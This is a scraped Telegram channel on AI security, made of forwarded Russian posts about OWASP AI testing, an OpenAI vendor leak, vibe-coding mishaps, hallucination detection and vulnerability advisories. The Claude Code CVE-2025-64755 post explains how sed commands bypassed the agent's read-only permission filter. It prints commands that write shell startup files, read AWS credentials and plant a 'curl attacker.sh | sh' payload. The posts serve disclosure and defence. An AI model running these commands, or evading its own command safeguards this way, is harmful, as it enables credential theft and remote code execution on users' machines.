AGI Security – Telegram
AGI Security
174 subscribers
35 photos
3 videos
9 files
77 links
Artificial General Intelligence Security
Download Telegram
Forwarded from 🕷 BugBountyRu
Раньше не принимали отчеты со сканеров, настало время запретить ИИ-галлюцинации (которые тоже могут быть своебразной атакой мусорными отчетами на триаж/дефектовщиков): https://daniel.haxx.se/blog/2025/07/14/death-by-a-thousand-slops/
This media is not supported in the widget
VIEW IN TELEGRAM
Forwarded from AISecHub
OWASP-AI-Testing-Guide-v1.pdf
6.2 MB
OWASP AI Testing Guide v1.0

The OWASP AI Testing Guide establishes the missing standard: a unified, practical, and comprehensive framework for trustworthiness testing of AI systems, grounded in real attack patterns, emerging global standards, and the lived experience of the AI security community.

Source: https://github.com/OWASP/www-project-ai-testing-guide
🔥2
Forwarded from OK ML
Как ошибка в разборе sed привела к обходу read-only защиты в Claude Code? CVE-2025-64755

Недавно была обнаружена критическая уязвимость в Claude Code, позволяющая обойти механизм read-only защиты и записывать произвольные файлы на хосте. Проблема получила идентификатор CVE-2025-64755, а исправление выпущено в версии 2.0.31. ✌️ Если обновляешь Claude Code вручную - самое время сделать это.

В Claude Code - сложная последовательность проверок для фильтрации bash-команд, которые модель может выполнять. Идея в том, чтобы разрешать только безопасные команды 👀, а опасные ьлокировать. Для этого используется:
🙈список безопасных команд и аргументов;
🙈множество чувствительных регулярных выражений;
🙈отдельная LLM (Haiku), которая проверяет, не содержит ли команда инъекцию;
🙈механизм checkPermissions для каждой встроенной тулы.

Однако весь этот сложный механизм имел одну точку провала - парсинг выражений в команде sed 🪞. Валидация выражений sed полагалась на несколько регулярных выражений, которые должны были выявлять опасные шаблоны. Но проверка была неполной. Благодаря особенностям реализации sed на macOS и неточно подобранным regex можно было выполнить команды вида:

echo 'runme' | sed 'w /Users/xpn/.zshenv'

Или
echo 1 | sed 'r/Users/xpn/.aws/credentials'

Claude Code доверял такой команде, считая её безопасной. 😏 В результате становилось возможным:

1. Запись в произвольный файл
Например, в .zshenv:

echo 'malware' | sed 'w ~/.zshenv'


2. Чтение конфиденциальных данных
AWS credentials, SSH keys, токены и тд и тп

3. Получение RCE через login shell
Вписав payload в .bashrc / .zshenv:

echo '$(curl attacker.sh | sh)' | sed 'w ~/.zshenv'

После запуска терминала - полный RCE.

Это пост - напоминание всем, кто строит агентные системы! 🌡️Инструменты интерпретации команд требуют не регэкс проверок, а строгих, формальных методов анализа.

Всё!
🆗
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Femida
Утечка из OpenAI

OpenAI стал рассылать пользователям письма о том, что их данные об использовании API платформы OpenAI украдены 😒

Говорят, что пострадала 3rd-party аналитическая платформа, и никаких «критических пользовательских данных» типа данных чатов не утекло.

На этот раз пронесло, но запоминаем правила старые как мир: не общаемся с GPT на щепетильные темы, и тем более никогда не отправляем в неё чувствительных данных.

Информации о продаже базы пока не появлялось 👀
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from PWN AI (Artyom Semenov)
Сохранёнок у меня, как обычно, вагон, но вот структурировать всё это руки доходят не всегда. Был ещё и незакрытый вопрос: «А что есть в Китае по AI Security?».

Если глянуть публикации на arXiv, китайских исследователей можно увидеть везде. Но кто именно лидирует по публикациям? Какие компании делают open-source (и проприетарные) решения для защиты пайплайнов, а также применяют классический ML в ИБ? Кстати, с последним вопросов меньше всего.

В итоге пришла мысль собрать всё это в единый список. Так появился он:

☺️ https://github.com/wearetyomsmnv/Awesome-China-AI-Security/

Список получился подробным и структурированным, многое удалось выделить в отдельные блоки.

Всё ради того, чтобы интересующиеся могли сразу пропустить титанически сложный процесс поиска ресурсов. Переводить репо на другие языки я не планирую, но вы всегда можете кинуть pull request или сделать форк, добавив свои находки.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from AISecHub
AI-VAPT

AI-VAPT is an autonomous AI-driven Vulnerability Assessment & Penetration Testing framework combining traditional VAPT with neural intelligence. It automates recon, scanning, and reporting using AI-powered analysis, CVE mapping, and exploit prediction — built for ethical hackers and enterprise security teams.

https://github.com/vikramrajkumarmajji/AI-VAPT
Forwarded from AISecHub
BugPilot-Ai

BugPilot AI is a professional desktop application that provides an intelligent interface for security testing and penetration testing. It combines the power of AI with real security tools to assist security professionals, bug bounty hunters, and penetration testers in conducting comprehensive security assessments.

https://github.com/letchupkt/BugPilot-Ai
Для полноты картины не хватает только, что бы и сам пост на Reddit был выдуман и написан ChatGPT. Таков timeline 🌝

tl;dr AI-генерённую парашу втюхали банку, после чего рансомварь всё поглотила и уничтожила

All prompt-generated. Zero understanding of the code. Shows it to a BANK. They like it. Tell her to move forward (she had a great business network btw). No idea what to do. Hires a team to "refactor". Quote: 300+ hours. Basically the cost of building a proper MVP from scratch.

But wait, it gets better.

The team she hired ALSO does vibe coding. They set up the server by asking ChatGPT. Result:

- SSH open to the world
- Root password: admin123 (or something similar)
- No firewall
- Nothing

Automated ransomware encrypted everything. Had to shut down, rotate all API keys (costing $$$), migrate everything.

The founder lost money on the hack, so much time, credibility with the client and trust in the process.

Here's the thing: Would you send a contract to a client without reading it, just because AI wrote it? Would you send an investor pitch without knowing what it says? Of course not. So why would you run your entire technical infrastructure on code you can't read?

AI amplifies what you already know. If you understand business, AI makes you better at business. If you know code, AI makes you code 10x faster. But if you know nothing about code and try to build a tech product with just prompts, you're not in control of your own company.

The new reality post-AI: You don't need 10 developers anymore. You need 1-3 people who REALLY know their domain, amplified by AI. That's more powerful than 20 people without AI.

That's what vibe coding in production is: unsupervised juniors all the way down.


[True Story] Non-technical founder tried to sell a 100% AI-generated MVP to a bank - I will not promote
https://www.reddit.com/r/startups/comments/1oex6aw/true_story_nontechnical_founder_tried_to_sell_a/
Forwarded from База знаний AI
⚙️Изучить на выходных: устройство фреймворка MAESTRO

Команда Института искусственного интеллекта AIRI в материале на «Хабре» рассказала о технических особенностях нового фреймворка MAESTRO. Он предназначен для построения мультиагентных систем и цифровых ассистентов на базе LLM.

Авторы описывают устройство программной платформы, а также приводят примеры использования фреймворка и рассказывают о планах по улучшению системы до конца 2026 года.

👉🏻Изучить материал
Forwarded from Neural Kovalskii
Circuit Tracing от Anthropic: как мы в R&D by red_mad_robot решили заглянуть внутрь LLM при использовании в RAG-пайплайнах

Ищем галлюцинации под микроскопом!

29 мая Anthropic выложили в open-source свои инструменты Circuit Tracing методологию механической интерпретируемости, которую мы в R&D подразделении red_mad_robot первыми применили для решения практической задачи детекции галлюцинаций в RAG-системах!

В начале 2025 года, когда я возглавил новое R&D направление, я поставил амбициозную задачу: не просто оценивать качество ответов LLM "снаружи", а заглянуть внутрь процесса генерации и понять, откуда берутся галлюцинации.

Почему именно RAG-пайплайны и Circuit Tracing?

Проблема была очевидна: RAG-системы часто смешивают информацию из контекста с "внутренними знаниями" модели, создавая правдоподобные, но неточные ответы
Существующие методы детекции работают post-factum, а нам нужно было понять механизм принятия решений в реальном времени

Circuit Tracing от Anthropic давал именно это возможность построить атрибуционные графы и проследить, как токены входного контекста влияют на финальный ответ модели

Конкретные результаты нашего исследования

85% точность детекции галлюцинаций вот что мы получили на тестовом датасете с нашей реализацией на базе Qwen2.5-7B.

Как отмечает наш исследователь Ирина Кошкина:
"Основная идея — измерение доли влияния от токенов входа, соответствующих контексту, среди всего влияния от всех активных токенов."

Наша метрика Groundedness включает:
- Контекстную долю влияния (Gctx)
- Replacement Score — качество признаков vs ошибок
- Completeness Score — полнота объяснения через атрибуционный граф

Технические вызовы и решения

Cross-Layer Transcoders (CLT) стали ключевым компонентом системы
Вместо анализа отдельных слоев мы научились отслеживать влияние признаков между несколькими архитектурными уровнями трансформера

Основные проблемы, которые пришлось решать:
1. Вычислительная сложность процедура анализа на порядки медленнее генерации
2. Зависимость от качества обученного транскодера
3. Токен-уровневое сопоставление, приводящее к ложным срабатываниям

Но результат того стоил мы получили рабочий инструмент для анализа внутренних процессов модели во время генерации ответов в RAG-системах


Отдельное спасибо отделу маркетинга red_mad_robot за подготовку детальной статьи оформления и валидации на Хабре

Отдельное спасибо Саше (@dealerAI) за экспертную валидацию нашей гипотезы на старте проекта

Когда предлагаешь исследовать "атрибуционные графы для детекции галлюцинаций в RAG", поддержка опытных друзей по цеху критически важна для получения ресурсов и мотивации команды

Полный технический разбор с кодом, формулами и результатами экспериментов доступен в нашей статье на Хабре закидываем в закладки и ставим +
Forwarded from Павел Дуров
🐣 Сегодня мы запустили децентрализованную сеть для ИИ-вычислений Cocoon («Кокон») — https://cocoon.org. Она обеспечивает пользователям 100% конфиденциальность при взаимодействии с ИИ. Часть запросов Telegram, связанных с автоматическим переводом сообщений, уже проходит через эту сеть.

🚀 Разработчики получают доступ к вычислительным ресурсам по более низким расценкам, чем у централизованных провайдеров вроде Microsoft или Amazon. А владельцы видеокарт могут зарабатывать криптовалюту TON в реальном времени, подключая свое оборудование к сети Cocoon.

В качестве логотипа сети Сосун Кокон мы выбрали ИИчко: 🤖
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from OK ML
CVE-2025-62164. Memory Corruption в vLLM через опасные sparse-тензоры

В движке vLLM, предназначенном для инференса и сервинга больших языковых моделей, в версиях с 0.10.2 до 0.11.1 (не включая 0.11.1) обнаружена критическая уязвимость CVE-2025-62164, вследствие повреждения памяти приводящая к DoS и потенциально к RCE.

Уязвимость заключается в обработке запроса Completions API😠, когда сервер принимает переданные пользователем эмбеддинги. При обработке этих данных vLLM выполняет:
torch.load()  # загрузка сериализованного тензора
tensor.to_dense() # преобразование в dense-формат


Опасная цепочка выглядит так:
1. Функция torch.load() не проверяет корректность структуры sparse-тензора, предоставленного пользователем.
2. Спасибо, PyTorch 2.8.0, за отключённые integrity checks 🤲
3. Из-за отсутствия проверок злоумышленник может создать специально сформированный sparse-тензор с некорректными индексами.
4. При вызове to_dense() такие данные обходят внутренние bounds-checks внутри PyTorch.
5. Это приводит к out-of-bounds записи (memory corruption).

Последствия
😳 DoS - процесс vLLM аварийно завершается из-за повреждения памяти.
😳 RCE - теоретически возможно выполнение произвольного кода на сервере, если злоумышленнику удаётся управлять направлением OOB-записи.

Патч уже вышел, обновляйтесь на 0.11.1, пока кто-нибудь не начал играть с вашей инфраструктурой!🛒

Всё!
🙂

NB
vLLM - высокопроизводительный движок инференса LLM, фокусирующийся на максимальной пропускной способности, минимальной задержке и оптимизации использования GPU-памяти.
Основная технология - PagedAttention, которая позволяет выделять память под токены эффективно. vLLM обеспечивает высокую пропускную способность, совместимость с OpenAI-совместимым API и поддержку популярных LLM. Активно используется в продакшене благодаря скорости, масштабируемости и простой интеграции.
Please open Telegram to view this post
VIEW IN TELEGRAM
1👍1😱1